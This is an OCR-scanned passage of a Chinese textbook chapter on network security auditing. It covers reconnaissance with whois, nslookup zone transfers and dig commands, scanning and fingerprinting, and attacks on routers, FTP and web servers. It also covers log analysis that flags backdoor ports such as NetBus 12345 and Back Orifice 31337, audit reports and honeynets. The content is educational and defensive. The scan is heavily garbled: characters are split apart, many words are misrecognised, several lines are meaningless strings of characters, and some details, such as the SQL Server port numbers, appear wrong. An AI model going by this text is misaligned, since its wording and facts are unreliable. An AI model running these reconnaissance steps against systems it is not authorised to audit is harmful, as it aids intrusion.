审核 人 员 或 黑客 找 不 到 现成 的 针对 某 种 漏洞 所 需 的 工具 时 ， 也 会 用 程序 语言 如 Perl、C、 
C++ 和 Java 编制 一 些 工 具 。 

1) DNS 工 具 

(1) whois 命令 。whois( 类 似 于 finger) 是 一 种 Intemet 的 目录 服务 ， 提 供 了 在 Internet 
上 一 台 主机 或 某 个 域 的 所 有 者 的 信息 (如 管理 员 的 姓名 、 通 信 地 址 、 电 话 号 码 和 E-mail 信箱 
等 )， 这 些 信 息 是 在 官方 网 站 whois server 上 注册 的 ， 保 存在 InterNIC 数据 库 内 。whois 命 
令 通常 是 安全 审核 人 员 了 解 网 络 情况 的 开始 ， 一 旦 得 到 了 whois 记录 ， 从 查询 的 结果 还 可 
以 得 知 主要 (primary) 和 次 要 (secondary) 域 名 服务 器 的 信息 。 

(2) nslookup。 使 用 DNS 的 排 错 工具 nslookup， 可 以 从 whois 查询 到 的 信息 侦查 更 多 
的 网 络 情况 。 例如 ， 使 用 nslookup 命令 把 主机 伪装 成 次 DNS 服务 器 ， 如 果 成 功 便 可 以 要 
求 从 主 DNS 服务 器 进行 区 域 传送 ,如 果 传 送 成 功 将 获得 大 量 有 用 信息 。 包括: 使 用 此 DNS 
服务 器 做 域名 解析 到 所 有 主机 名 和 IP 地 址 的 映射 情况 、 公 司 使 用 的 网 络 和 子 网 情况 、 主 机 
在 网 络 中 的 用 途 。 一 旦 从 区 域 传送 中 获得 了 有 用 信息 ， 便 可 以 对 每 台 主机 实施 端口 扫描 以 
确定 其 提供 了 哪些 服务 。 如 果 不 能 实现 区 域 传送 ， 还 可 以 借助 ping 和 端口 扫描 工具 或 
traceroute 来 达到 目的 。 

(3) host 命令 。host 命令 是 UNIX 提供 的 有 关 Internet 域名 查询 的 命令 ,可 实现 主机 名 
到 了 他 地址 的 映射 反之 亦 然 。 用 host 命令 可 实现 以 下 功能 : 实现 区 域 传送 ;获得 名 称 解 析 
信息 ; 得 知 域 中 邮件 服务 器 的 信息 。 

(4) dig 命令 。dig 命令 相对 于 host 命令 提供 了 更 多 的 信息 。 如 下 面 的 两 条 dig 命令 : 
第 一 条 命令 可 以 为 攻击 者 提供 company.com 域名 所 有 的 MX 和 NS 记录 ; 第 二 条 命令 只 
供 NS 记录 。 
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dig company.com any 

dig company.com ns 

2) ”ping 扫描 

使 用 命令 ping 一 个 公司 的 Web 服务 器 可 获得 该 公司 所 使 用 的 他 地 址 范围 ， 一 旦 得 知 
HTTP 服务 器 的 他 地址， 就 可 以 使 用 ping 扫描 工具 ping 该 子 网 的 所 有 也 地 址 ， 进 而 得 到 
该 网 络 的 地 址 图 。 

在 Windows 系统 的 命令 行 中 可 以 执行 ping 命令 ， 且 WS_PingProPack 工具 包 中 集成 有 
ping 扫描 程序 。Rhino9 Pinger 是 比较 流行 的 程序 ， 使 用 traceroute， 可 以 推测 出 网 络 的 物理 
布局 ， 包 括 该 网 络 连接 Internet 所 使 用 的 路 由 器 。 

3) ”端口 扫描 及 相应 软件 工具 

端口 扫描 与 ping 扫描 相似 ， 不 同 的 是 端口 扫描 不 仅 可 以 返回 P 地 址 ， 还 可 以 发 现 目 
标 系统 上 活动 的 UDP 和 TCP 端口 。 

端口 扫描 程序 是 黑客 最 常 使 用 的 工具 。 一 些 单独 使 用 的 端口 扫描 程序 ， 如 Port Scanner 
1.3， 在 定义 好 瑟 地 址 范围 和 端口 后 便 可 实施 扫描 。 像 ping 扫描 程序 ， 许 多 工具 也 集成 了 
端口 扫描 程序 ， 并 且 NetScan、pingPro 和 其 他 一 些 程序 包 集 成 了 尽 可 能 多 的 相关 程序 。 

人 ”网 络 侦查 和 服务 器 侦查 程序 

(1) 服务 扫描 。RedButton 可 以 从 开启 了 server 服务 的 Windows 2000/NT 服务 器 获取 
信息 。 只 要 对 方 的 Windows 2000/NT 服务 器 开启 了 Server 服务 ， 就 能 有 效 地 获知 当前 登录 
的 用 户 是 管理 员 组 里 的 哪个 帐号 。 

(2) 堆栈 指纹 。 堆栈 指纹 技术 可 以 用 TCP/IP 来 识别 不 同 的 操作 系统 和 服务 。 大 多 数 的 
系统 管理 员 注意 到 信息 的 泄漏 并 屏蔽 了 系统 标志 ， 所 以 ， 应 用 堆栈 指纹 的 技术 十 分 必要 。 
但 是 , 各 厂商 和 系统 处 理 TCP/IP 协议 的 特征 却 是 管理 员 难以 更 改 的 。 许 多 审核 人 员 和 黑客 
记录 下 这 些 TCP/IP 应 用 的 细微 差别 ， 并 针对 各 种 系统 构建 了 堆栈 指纹 表 。 

想 了 解 操作 系统 间 处 理 TCP/IP 协议 的 差异 需要 向 这 些 系统 的 卫 和 端口 发 送 各 种 特殊 
的 包 。 根 据 这 些 系 统 对 包 的 回应 的 差别 可 以 推断 出 某 些 操作 系统 的 种 类 。 例 如 ， 向 主机 发 
送 FIN 包 (或 任何 不 含有 ACK 或 SYN 标 志 的 包 ), 从 回应 中 可 以 判断 下 列 操作 系统 :Microsoft 
Windows NT、98、95 和 3.11; FreeBSD; Cisco; HP/UX。 当 然 ， 大 多 数 其 他 系统 不 会 做 
出 回应 。 但 如 果 向 目标 系统 发 送 的 报 文 头 有 未 定义 标志 的 TCP 包 , 2.0.35 版 本 以 前 的 Linux 
系统 会 在 回应 中 加 入 这 个 未 定义 的 标志 ， 这 种 特定 的 行为 就 可 以 判断 出 目标 主机 上 是 否 运 
行 该 种 Linux 操作 系统 。 

(3) 强大 的 网 络 侦 查 工具 一 一 NMAP。NMAP 由 于 功能 强大 、 升 级 速度 快 和 免费 ， 目 
前 已 经 十 分 流行 。NMAP 适用 于 网 络 侦查 是 因为 它 有 三 个 显著 的 特点 : 第 一 ， 非 常 灵活 的 
TCP/IP 堆栈 指纹 引擎 ，NMAP 的 制作 人 FYODOR 不 断 升级 该 引擎 使 它 能 够 尽 可 能 多 的 进 
行 侦查 ; 第 二 , NMAP 可 以 准确 地 扫描 服务 器 操作 系统 (包括 Novell UNIX、Linux、Windows 
NT)、 路 由 器 (包括 Cisco、3COM 和 HP) 以 及 一 些 拨号 设备 ; 第 三 ， 可 以 穿 透 网 络 边缘 的 安 
全 设备 ， 例 如 防火 墙 。 

5) ”共享 扫描 

(1) 共享 扫描 软件 ，PingPro 一 一 扫描 Windows 网 络 共享 ，Red Button 一 一 扫描 共享 
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名 称 及 相应 密码 。 

(2) 审核 人 员 可 以 编写 一 些小 工具 查找 因 默 认 配 置 造成 的 系统 弱点 。 

(3) 利用 Telnet 客户 端 程序 连接 到 其 他 端口 。 

(4) 使 用 SNMP 从 网 络 主机 上 查询 相关 的 数据 。 

(5) TCP/IP 服务 

TCP/IP 提供 的 服务 增加 了 中 间 人 攻击 成 功 的 可 能 性 , 黑客 可 以 通过 Finger 获取 远程 服 
务 器 上 的 用 户 信 息 ， 如 用 户 名 、 服 务 器 名 、E-mail 帐号 、 用 户 当前 是 否 在 线 、 用 户 登录 时 
间 、 用 户 的 crond 任务 等 。 


11.2.4 ”审核 服务 器 渗透 和 攻击 技术 

1. 网 络 渗透 技术 

- 旦 黑客 准确 定位 用 户 的 网 络 ， 会 选 定 一 个 目标 进行 渗透 ， 通 常 这 个 目标 会 是 安全 漏 
洞 最 多 或 是 他 拥有 最 多 攻击 工具 的 主机 。 

2. 攻击 特征 和 审核 


攻击 特征 是 攻击 的 特定 指纹 。 

常见 的 攻击 方法 如 下 。 

(1) 字典 攻击 : 黑客 利用 一 些 自动 执行 的 程序 猜测 用 户 名 和 密码 ， 审 核 这 类 攻击 通常 
需要 做 全 面 的 日 志 记录 和 入 侵 监 测 系统 (IDS)。 

(2) Man-in-the-middle 攻击 : 黑客 从 合法 的 传输 过 程 中 获取 密码 和 信息 。 防 范 这 类 攻 
击 的 有 效 方法 是 应 用 复杂 的 加 密 。 

(3) 劫持 攻击 : 在 双方 进行 会 话 时 被 第 三 方 (黑客 ) 入 侵 ， 黑 客 黑 掉 其 中 一 方 ， 并 冒充 
继续 与 另 一 方 进行 会 话 。 虽 然 不 是 彻底 的 解决 方案 ， 但 有 效 的 验证 方法 将 有 助 于 防范 这 种 
攻击 。 

(4) 病毒 攻击 : 病毒 是 能 够 自我 复制 和 传播 的 小 程序 ， 它 将 消耗 系统 资源 。 在 审核 过 
程 中 ， 你 应 当 安 装 最 新 的 反 病 毒 程序 ， 并 对 用 户 进行 防 病毒 教育 。 

(5) 非法 服务 : 非法 服务 是 任何 未 经 同意 便 运 行 在 操作 系统 上 的 进程 或 服务 。 

(6) 拒绝 服务 攻击 : 利用 各 种 程序 (包括 病毒 和 包 发 生 器 ) 使 系统 骨 省 或 消耗 带宽 。 

最 常 遭 受 攻击 的 目标 包括 路 由 器 、 数 据 库 、Web 和 FTP 服务 器 及 与 协议 相关 的 服务 ， 
如 DNS、WINS 和 SMB。 图 11-1 所 示 是 易 受 攻击 的 目标 。 


3. 对 路 由 器 的 攻击 


路 由 器 是 内 部 网 络 与 外 界 的 一 个 通信 出 口 ， 它 在 一 个 网 络 中 充当 着 平衡 带宽 和 转换 中 
地 址 的 作用 ,实现 通过 少量 外 部 瑟 地 址 让 内 部 多 台 计 算 机 同时 访问 外 网 。 连 接 公 网 的 路 由 
器 由 于 被 暴露 在 外 ， 通 常 成 为 被 攻击 的 对 象 。 路 由 器 被 拒绝 服务 攻击 ， 将 造成 内 部 网 络 不 
能 访问 外 网 ， 甚 至 造成 网 络 瘫痪 。 路 由 器 的 物理 安全 同样 需要 了 予以 关注 。 

对 路 由 器 直接 进行 攻击 的 方式 有 以 下 几 个 方面 。 

(1) 发 送 虚 假 路 由 信息 ， 使 路 由 器 路 由 混乱 从 而 导致 网 络 瘫痪 。 


名 
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11-1 易 受 攻击 的 目标 


(2) 攻击 者 通过 改变 自己 的 他 地 址 来 伪装 成 内 部 网 用 户 或 可 信任 的 外 部 网 络 用 户 , 发 
送 特 定 的 报 文 以 扰乱 正常 的 网 络 数据 传输 。 

(3) 伪造 一 些 可 接收 的 路 由 报 文 来 更 改 路 由 信息 ， 以 窃取 信息 。 

(4) 将 自制 路 由 器 放 在 网 络 上 ， 完 全 改变 原 有 路 由 器 的 功能 ， 造 成 报 文 无 序 路 由 。 

(5) 端口 扫描 攻击 方式 ， 攻 击 者 通过 探测 防火 墙 在 侦 听 的 端口 发 现 系统 的 漏洞 ， 然 后 
利用 这 些 漏洞 对 路 由 器 进行 攻击 ， 使 得 整个 路 由 器 关闭 或 无 法 正常 运行 。 

4. 对 数据 库 的 攻击 

黑客 最 想得到 的 是 公司 或 部 门 的 数据 库 。 数 据 库 中 包括 以 下 敏感 信息 : 雇员 数据 (如 个 
人 信息 和 薪金 情况 )、 市 场 和 销售 情况 、 重 要 的 研发 信息 、 货 运 情况 。 对 于 有 特别 敏感 数据 
的 服务 器 ， 审 核 时 应 特别 注意 检查 有 无 危险 漏洞 存在 。 

黑客 可 以 识别 并 攻击 数据 库 。 每 种 数据 库 都 有 它 自身 的 特点 ， 如 MS SQL Server 使 用 
1344/1434 端口 ，PostgreSQL servers 使 用 5432 端口 ， 应 该 确保 防火 墙 能 够 对 这 些 数 据 库 进 
行 保护 。 

5. 对 Web 服务 器 和 FTP 服务 器 的 攻击 


WEB 和 FTP 服务 器 通常 置 于 DMZ 中 ， 极 易 遭 到 攻击 。Web 和 FTP 服务 器 通常 存在 
的 问题 包括 : 用 户 通过 公 网 发 送 未 加 密 的 信息 ; 操作 系统 和 服务 存在 众所周知 的 漏洞 导致 
拒绝 服务 攻击 或 破坏 系统 ;在 操作 系统 中 存在 以 root 权限 初始 运行 的 服务 ， 一 旦 被 黑客 破 
坏 ， 入 侵 者 便 可 以 在 产生 的 命令 解释 器 中 运行 任意 的 代码 。 

1) FTP bounce 攻击 

FTP 服务 器 很 容易 受到 “FTP bounce” 攻 击 ， 这 种 攻击 方法 可 以 绕 过 防火 墙 。 

FTP bounce 攻击 的 危害 : 

(1) 端口 扫描 。 

(2) 突破 常规 防火 墙 。 

(3) 从 限制 源 他 站 点 下 载 敏 感 信息 。 

(4) 与 java applet 结合 突破 动态 防火 墙 。 
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防范 FTP bounce 攻击 : 

(1) 拒绝 源 端 口 为 tcp/20 的 链接 请 求 。 

(2) 限制 PORT 命令 ， 指 定 控制 流 上 的 client 人 P。 

(3) 对 PORT 命令 作 两 种 设置 : 默认 设置 和 自 定义 设置 。 

(4) 限制 匿名 FTP 帐号 的 权限 。 

(5) 谨慎 选用 Firewall 并 仔细 配置 。 

2) ”Web 页 面 算 改 

大 多 数 情况 下 Web 页 面 的 涂改 意味 着 存在 着 入 侵 的 漏洞 。 这 些 攻 击 通 常 包括 中 间 人 攻 
击 (使 用 包 嗅 探 器 ) 和 缓冲 区 溢出 。 有 时 ， 还 包括 支持 攻击 和 拒绝 服务 攻击 。 

防范 网 页 自 改 系统 的 技术 有 以 下 几 种 。 

(1) 外 挂 轮 询 技 术 : 外 挂 轮 询 技术 是 利用 一 个 网 页 检测 程序 ， 以 轮 询 方式 读 出 要 监控 
的 网 页 ， 与 真实 网 页 相 比较 ， 来 判断 网 页 内 容 的 完整 性 ， 对 于 被 算 改 的 网 页 进行 报警 和 恢复 。 

(2) 核心 内 婴 技 术 : 核心 内 嵌 技 术 是 将 算 改 检测 模块 内 区 在 Web 服务 器 软件 里 ， 它 在 
每 一 个 网 页 流出 时 都 进行 完整 性 检查 ， 对 于 算 改 网 页 进行 实时 访问 阻 断 ， 并 予以 报警 和 
恢复 。 

(3) 事件 触发 技术 : 事件 触发 技术 是 利用 操作 系统 的 文件 系统 接口 ， 在 网 页 文件 被 修 
改 时 进行 合法 性 检查 ， 对 非法 操作 进行 报警 和 恢复 。 

6. 对 电子 邮件 服务 器 的 攻击 


目前 对 邮件 服务 器 的 攻击 主要 分 为 网 络 入 侵 和 拒绝 服务 两 种 ， 对 于 网 络 入 侵 的 防范 ， 
主要 依赖 于 软件 编程 时 的 严谨 程度 ， 一 般 选 类 型 时 很 难 从 外 部 衡量 。 


7. 结合 攻击 制定 审核 策略 


了 解 哪些 网 络 设备 和 服务 是 容易 遭受 攻击 的 目标 和 符合 黑客 活动 的 攻击 特征 ， 有 助 于 
在 审核 过 程 中 关注 那些 设备 和 服务 。 


11.2.5 ”控制 阶段 的 安全 审核 


1. 控制 阶段 的 目标 


(1) 获得 root 的 权限 ， 攻 击 者 最 终 目 的 是 获得 root 权限 。root 权限 是 终极 的 前 提 ， 因 
为 它 有 权 建立 更 多 的 帐号 ， 操 纵 服 务 以 及 对 系统 持续 进行 控制 。 

(2) 创建 额外 帐号 。 为 了 减少 从 系统 中 被 清除 的 可 能 性 ， 攻 击 者 通常 会 在 获得 root 权 
限 后 创建 额外 的 帐号 ， 使 用 几 个 不 同 的 帐号 进行 异常 活动 。 

(3) 收集 特定 信息 ， 信 息 获取 比 侦查 阶段 的 更 具有 针对 性 ， 该 信息 会 导致 重要 的 文件 
和 信息 的 泄漏 。 

(4) 开启 新 的 安全 漏洞 。 

(5) 进行 端口 重 定向 ， 攻 击 者 控制 系统 后 进行 程序 和 端口 重 定向 。 

(6) 控 除 渗透 痕迹 ， 攻 击 者 通过 破坏 系统 日 志 来 实现 清除 入 侵 痕 迹 ， 防 止 删除 系统 日 
志 的 最 好 办 法 是 做 好 系统 日 志 的 备份 ， 将 日 志 存 储 到 远程 系统 上 。 
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如 果 攻 击 者 成 功 地 进行 到 这 一 阶段 ， 通 常 就 很 难 被 发 现 ， 应 该 尽 可 能 在 渗透 阶段 发 现 
和 阻止 他 们 的 攻击 行为 。 

2. 控制 方法 

新 的 控制 方法 层出不穷 ， 原因 有 : 系统 的 升级 不 可 避免 地 会 开启 新 的 安全 漏洞 ， 少 数 
黑客 也 会 不 断 开 发 新 的 工具 。 

(1) 系统 默认 设置 ， 攻 击 者 可 以 用 默认 攻击 设置 来 完全 控制 系统 。 改 变 默 认 设 置 可 以 
极 大 地 增强 操作 系统 的 安全 性 。 

(2) 合法 服务 ， 守 护 进 程 和 可 装载 模块 。Windows 2000 运行 服务 、UNIX 运行 守护 进 
程 、Novell 操作 系统 运行 可 装载 的 模块 ， 这 些 守护 进程 可 以 被 用 来 破坏 操作 系统 的 安全 

3. 控制 阶段 的 审核 


(1) 审核 人 员 应 熟练 地 运用 扫描 程序 、 日 志文 件 和 其 他 工具 。 
(2) 审核 人 员 必 须 懂得 什么 是 可 疑 的 流量 。 
(3) 审核 人 员 和 攻击 者 最 主要 的 不 同 点 是 审核 人 员 从 不 真正 进入 控制 阶段 。 


11.3 ”审核 和 日 志 分 析 


11.3.1 日 志 分 析 


日 志 分 析 提 供 了 确定 何 时 产生 缺陷 及 如 何 产生 缺陷 的 方法 。 在 审核 过 程 中 ， 需 要 投入 
大 量 的 时 间 分 析 日 志文 件 ， 因 为 要 真正 区 分 合法 与 非法 用 户 非 常 困难 。 

日 志 记录 应 注意 把 握 分 寸 , 如 果 记 录 得 太 多 ， 则 有 用 信息 不 易 查 找 ， 如 果 记 录 得 太 少 ， 
则 不 能 收集 足够 的 信息 。 


11.3.2 ”建立 基线 


建立 基线 是 进行 日 志 分 析 的 开始 。 基 线 是 网 络 活动 的 参考 标准 。 通 过 一 段 时 间 对 日 志 
的 仔细 分 析 ， 可 以 建立 一 条 用 户 活动 基线 。 在 建立 基线 的 过 程 中 ， 应 根据 用 户 的 活动 倾向 
对 日 志 进 行 检查 。 大 多 数 公司 网 络 活动 最 频繁 的 时 间 段 出 现在 清晨 上 班 、 午 餐 期 间 和 下 班 
时 间 ， 活 动 图 样 会 有 所 不 同 。 


11.3.3 ”防火 墙 和 路 由 器 日 志 


在 分 析 防 火 墙 和 路 由 器 日 志 时 ， 集 中 完成 下 列 任务 。 

e ”识别 源 和 目的 端口 。 

。 ”找到 源 主机 和 目的 主机 。 

。 ”跟踪 使 用 迹象 ， 在 每 个 接口 上 观察 能 够 显示 从 外 部 进行 过 扫描 的 迹象 ， 这 种 迹象 
表明 有 人 在 试图 勾勒 网 络 的 拓扑 结构 。 

。 协议 的 使 用 : 搜寻 与 Internet 直接 相关 的 应 用 , 包括 HTTP 流量 、RealPlayer、MP3 
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流量 、ICQ、 及 时 消息 和 了 IRC 流量 。 此 外 ， 还 要 搜寻 ICMP、TCP 和 UDP 连接 。 
。 ”搜索 可 疑 端 口 的 连接 : 例如 12345(NetBus 默认 端口 ) 和 31337 端口 (BackOrifice 
2000 的 默认 端口 )。 


11.3.4 ”操作 系统 日 志 


1. UNIX 系统 日 志 
Syslogd 是 记录 Linux 和 UNIX 系统 日 志 的 服务 。 可 以 通过 编辑 /etc/syslog.conf 文件 配 


置 该 服务 。UNIX 系统 中 可 以 通过 本 地 工具 对 发 生 过 的 活动 进行 分 析 ， 这 些 工 具 如 下 所 列 。 


制 。 


@ last: 扫描 /var/log/lastlog 文件 并 报告 各 种 信息 ; 

。 “lastb: 提供 尝试 登录 失败 的 信息 ; 

。 ”lastlog: 提供 关于 所 有 用 户 最 后 一 次 登录 的 信息 ， 还 有 哪些 用 户 从 未 登录 。 
还 有 一 些 常 见 的 日 志 如 下 。 

access-log: 记录 HTTP/Web 的 传输 ; 

acet/pacct: 记录 用 户 命令 ; 

aculog: 记录 Modem 的 活动 ; 

btmp: 记录 失败 的 记录 ; 

lastlog: 记录 最 近 一 次 成 功 登录 的 事件 和 最 后 一 次 不 成 功 的 登录 ; 
messages: 从 syslog 中 记录 信息 (有 的 链接 到 syslog 文件 ); 

sudolog: 记录 使 用 sudo 发 出 的 命令 ; 

sulog: 记录 使 用 su 命令 的 使 用 ; 

syslog: 从 syslog 中 记录 信息 (通常 链接 到 messages 文件 ); 

utmp: 记录 当前 登录 的 每 个 用 户 ; 

wtmp: 一 个 用 户 每 次 登录 进入 和 退出 时 间 的 永久 记录 ; 

xferlog: 记录 FTP 会 话 。 

2. Windows 2000 系统 日 志 

事件 查看 器 是 Windows 2000 本 地 上 日志 记录 的 工具 , 通过 它 可 以 对 事件 日 志 服务 进行 控 
Windows 2000 将 它 的 日 志 分 为 以 下 四 个 类 别 。 

系统 日 志 : 记录 服务 启动 成 功 和 失败 ， 系 统 关闭 和 重启 。 

安全 性 日 志 : 记录 用 户 登 录 ， 用 户 权 限 的 使 用 和 变更 ， 对 象 的 访问 。 

应 用 程序 日 志 : 记录 与 工作 系统 有 关 的 程序 的 运行 的 情况 。 

DNS 服务 日 志 : 如 果 DNS 服务 被 安装 ， 日 志 将 包含 所 有 它 所 发 布 的 信息 。 


3. 开启 Windows 2000 的 审核 功能 
审核 是 Windows NT/2000 中 本 地 安全 策略 的 一 部 分 , 它 是 一 个 维护 系统 安全 性 的 工具 。 


通过 审核 ， 我 们 可 以 记录 下 列 信息 。 


。 ”哪些 用 户 企 图 登录 到 系统 中 或 从 系统 中 注销 、 登 录 以 及 注销 的 日 期 和 时 间 、 是 否 
成 功 等 ; 
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。 ”哪些 用 户 对 指定 的 文件 、 文 件 夹 或 打印 机 进行 哪 种 类 型 的 访问 ; 

。 ”系统 的 安全 选项 进行 了 哪些 更 改 ; 

。 ”用 户 帐户 进行 了 哪些 更 改 ， 是 否 增加 或 删除 了 用 户 等 。 

根据 监控 审核 结果 ， 可 以 将 计算 机 资源 的 非法 使 用 消除 或 减 到 最 小 。 通 过 查看 审核 信 
息 ， 能 够 及 时 发 现 系统 存在 的 安全 隐患 ， 通 过 了 解 指定 资源 的 使 用 情况 来 指定 资源 使 用 计 
划 。 审 核 功 能 通过 管理 工具 中 的 本 地 安全 策略 工具 进行 设置 。 


11.3.5 ”其 他 类 型 日 志 


事件 日 志 不 仅仅 包括 路 由 器 、 防 火 墙 和 操作 系统 的 日 志 ， 通 常 还 包括 以 下 一 些 日 志 
记录 。 
入 侵 检测 系统 日 志 。 
电话 连接 (包括 语音 邮件 ) 日 志 。 
ISDN 或 帧 中 继 连接 (frame relay) 日 志 。 
职员 访问 日 志 。 


11.3.6 “日志 的 存储 


系统 日 志 同 样 也 是 黑客 攻击 的 目标 ， 审 核 员 应 有 效 地 保护 日 志 记 录 不 受 破坏 。 建 议 
如 下 。 

。 ”利用 不 同 的 计算 机 存放 日 志 。 

。 ”将 日 志 记 录 刻 成 光盘 保存 。 

e ”使 用 磁盘 备份 设备 。 


11.4 审核 结果 


11.4.1 ”建立 初步 审核 报告 


安全 审核 报告 中 应 包含 以 下 元 素 。 

。 ”对 现在 的 安全 等 级 进行 总 体 评价 :报告 中 应 该 给 出 高 、 中 、 低 的 结论 ， 包 括 监 视 
的 网 络 设备 或 系统 的 简要 评价 (如 大 型 机 、 路 由 器 、Windows NT/2000 系统 、UNIX 
系统 等 )。 

。 对 偶然 的 、 有 经 验 的 和 专家 级 的 黑客 入 侵 系 统 分 别 作出 时 间 上 的 估计 。 

简要 总 结 出 最 重要 的 建议 ， 并 提供 相应 的 支撑 材料 (如 安全 扫描 仪 的 扫描 结果 、 路 

由 器 /防火 墙 和 IDS 等 的 日 志 分 析 报告 )。 

详细 描述 审核 过 程 的 步骤 。 

对 各 种 网 络 元 素 提出 整改 建议 ， 包 括 路 由 器 、 端 口 、 服 务 、 登 录 帐 号 等 。 

对 物理 安全 提出 建议 。 

对 安全 审核 领域 内 使 用 的 术语 进行 解释 。 

详细 解释 系统 可 能 出 现 的 问题 的 报告 。 


由 由 欧 77 竟 。” 安 会 声 攻 所 克 礁 分 原 


11.4.2 ”收集 客户 意见 


在 审核 报告 中 我 们 要 充分 考虑 客户 的 意见 ， 审 核 报告 的 内 容 应 与 客户 进行 沟通 ， 考 虑 
以 下 几 个 方面 。 

。 确认 审核 报告 初稿 中 的 内 容 是 否 有 误 。 

。 ”向 客户 求证 还 有 疑问 的 地 方 。 

。 ”明确 客户 所 关心 的 问题 。 

。 ”确认 报告 的 提交 时 间 。 


11.4.3 制定 详细 审核 报告 


依据 审核 的 结果 ， 以 及 相应 的 审核 标准 并 结合 客户 的 意见 ， 制 定 详细 的 审核 报告 。 
审核 报告 所 包含 的 主要 内 容 以 及 参考 标准 请 参见 11.4.4 小 节 的 内 容 。 


11.4.4 ”推荐 审核 方案 


细致 的 书面 审核 方案 ， 建 议 从 三 个 角度 来 提出 。 

。 ”为 了 能 够 有 效 地 确定 安全 策略 和 实施 情况 的 差距 ， 建 议 采 用 一 些 特殊 方法 继续 进 
行 有 效 的 审核 。 

。 ”抵御 和 清除 病毒 、 蠕 虫 和 木马 ， 修 补 系 统 漏洞 。 

。 ”建议 完善 和 增强 如 下 内 容 。 
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重新 配置 路 由 器 或 重新 规划 网 络 拓扑 。 

重新 配置 和 添加 防火 墙 规则 。 

升级 操作 系统 补丁 。 

升级 旧 的 或 不 安全 的 服务 和 操作 系统 。 
增强 网 络 审核 。 

自动 实施 和 集中 管理 网 络 内 部 和 边界 安全 。 
增设 入 侵 检测 产品 。 

实施 反 病毒 扫描 。 

提高 用 户 级 别 的 加 密 ( 如 PGP/GPG) 和 网 络 级 别 的 加 密 (如 IPSEC)。 
删除 不 必要 的 用 户 帐 号 、 应 用 程序 和 服务 。 
检查 可 能 存在 的 安全 策略 的 改变 。 

提高 物理 安全 。 

建议 对 IT 技术 人 员 和 终端 用 户 进行 培训 。 
告知 用 户 现 有 的 措施 能 够 保障 系统 很 好 地 工作 。 


11.4.5 “排除 安全 隐患 
1. 增强 路 由 器 安全 
增强 路 由 器 安全 的 一 般 方法 包括 以 下 几 方 面 。 


(> 网络 安全 管理 与 维护 


潼 汀 车手 半 ”全 涟 民 侣 村 才 到 妇 到 


e ”严格 控制 路 由 器 的 物理 访问 权限 。 

。 ”及 时 获取 最 新 的 操作 系统 (包括 NT 系统 做 路 由 和 专门 的 路 由 器 操作 系统 ， 例 如 
Cisco IOS)。 

。 确保 路 由 器 不 受 拒 绝 服务 攻击 的 影响 。 

。 ”确保 不 让 路 由 器 在 不 知情 的 情况 下 成 为 拒绝 服务 攻击 的 帮凶 。 


2. 实施 主动 检测 


主动 检测 是 指使 用 黑客 的 策略 和 手法 来 对 付 黑客 ， 而 不 是 简单 地 停止 攻击 。 一 个 有 效 
的 检测 策略 通常 包括 审核 。 


11.5 早期 预警 与 事件 响应 


11.5.1 为 不 可 避免 的 情况 做 准备 


黑客 盗用 帐户 ， 病 毒 、 木 马 窃取 用 户 信息 层出不穷 ， 面 对 这 一 切 ， 过 去 网 络 管理 员 只 
需要 每 个 星期 ， 甚 至 每 个 月 做 一 次 补丁 更 新 便 可 高 枕 无 忧 。 但 是 今天 ， 网 络 管理 员 即 使 每 
天 都 在 实时 地 做 着 更 新 ， 网 络 还 是 会 随时 面临 着 被 攻击 的 威胁 。 问 题 的 根源 在 于 破坏 者 采 
用 的 技术 手段 越 来 越 先进 、 复 杂 ， 不 断 地 在 新 的 思路 上 升级 其 破坏 性 。 

对 此 ， 网 络 安全 管理 员 应 采取 主动 防御 ， 就 是 将 安全 技术 、 策 略 、 理 念 以 及 服务 整合 
起 来 ， 帮 助 企业 建立 或 重 整 一 套 安全 管理 的 流程 ， 满 足 网 络 的 安全 需求 。 要 实现 主动 防御 
不 仅 要 突破 以 往 传统 被 动 的 安全 防御 模式 ， 改 变 只 能 跟 在 攻击 者 后 面 的 状况 ， 建 立 良好 、 
可 信赖 的 网 络 安全 环境 ， 而 且 还 必须 做 好 安全 策略 的 强制 实施 。 


11.5.2 窗 网 
1. 基本 概念 


蜜 网 是 在 蜜 饶 技 术 上 逐渐 发 展 起 来 的 一 个 新 的 概念 ， 又 可 成 为 诱捕 网 络 。 密 网 技术 实 
质 上 还 是 一 类 研究 型 的 高 交互 蜜 缸 技术 ， 其 主要 目的 是 收集 黑客 的 攻击 信息 。 但 与 传统 的 
蜜 饶 技 术 的 差异 在 于 ， 蜜 网 构成 了 一 个 黑客 诱捕 网 络 体系 架构 ， 在 这 个 架构 中 ， 可 以 包含 
-个 或 多 个 蜜 缸 ， 同 时 保证 网 络 的 高 度 可 控 性 ， 以 及 提供 多 种 工具 以 方便 对 攻击 信息 的 采 
集 和 分 析 。 


2. 分 类 


1) ”根据 交互 级 别 的 不 同 

根据 蜜 网 与 攻击 者 之 间 进行 的 交互 对 蜜 网 进行 分 类 ， 可 以 将 蜜 网 分 为 低 交 互 蜜 网 、 中 
交互 蜜 网 和 高 交互 蜜 网 。 低 交互 蜜 网 仅 提供 一 些 简单 的 虚拟 服务 ， 例 如 监听 某 些 特定 端口 ， 
该 类 蜜 网 风险 最 低 ， 但 或 多 或 少 存在 着 一 些 容易 被 黑客 所 识别 的 指纹 (Fingerprinting) 信 息 。 
中 交互 蜜 网 提供 了 更 多 的 可 交互 信息 ， 它 能 够 预期 一 些 活动 ， 并 可 以 给 出 一 些 低 交互 蜜 网 
无 法 给 予 的 响应 ， 但 是 仍然 没有 为 攻击 者 提供 一 个 可 使 用 的 操作 系统 。 同 时 诱骗 进程 变 得 
更 加 复杂 ， 对 特定 服务 的 模拟 变 得 更 加 完善 的 同时 ， 风 险 性 也 更 大 了 。 高 交互 蜜 网 为 攻击 
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者 提供 一 个 真实 的 支撑 操作 系统 ， 此 类 蜜 网 复杂 度 和 甜 度 大 大 增加 ， 收 集 攻 击 者 信息 的 能 
力也 大 大 增强 ， 但 蜜 网 也 具有 高 度 危 险 ， 攻 击 者 最 终 目 标 就 是 取得 root 权限 ， 自 由 存 取 目 
标 机 上 的 数据 ， 然 后 利用 已 有 资源 继续 攻击 其 他 计算 机 。 究 竞 使 用 何等 交互 级 别 的 蜜 网 取 
决 于 所 要 实现 的 目标 。 

2) ”根据 部 署 日 的 的 不 同 

按照 部 署 目的 不 同 分 为 产品 型 蜜 网 和 研究 型 蜜 网 两 类 。 产 品 型 蜜 网 为 一 个 组 织 的 网 络 
提供 安全 保护 ， 包 括 检测 攻击 、 防 止 攻击 造成 破坏 及 帮助 管理 员 对 攻击 做 出 及 时 正确 的 响 
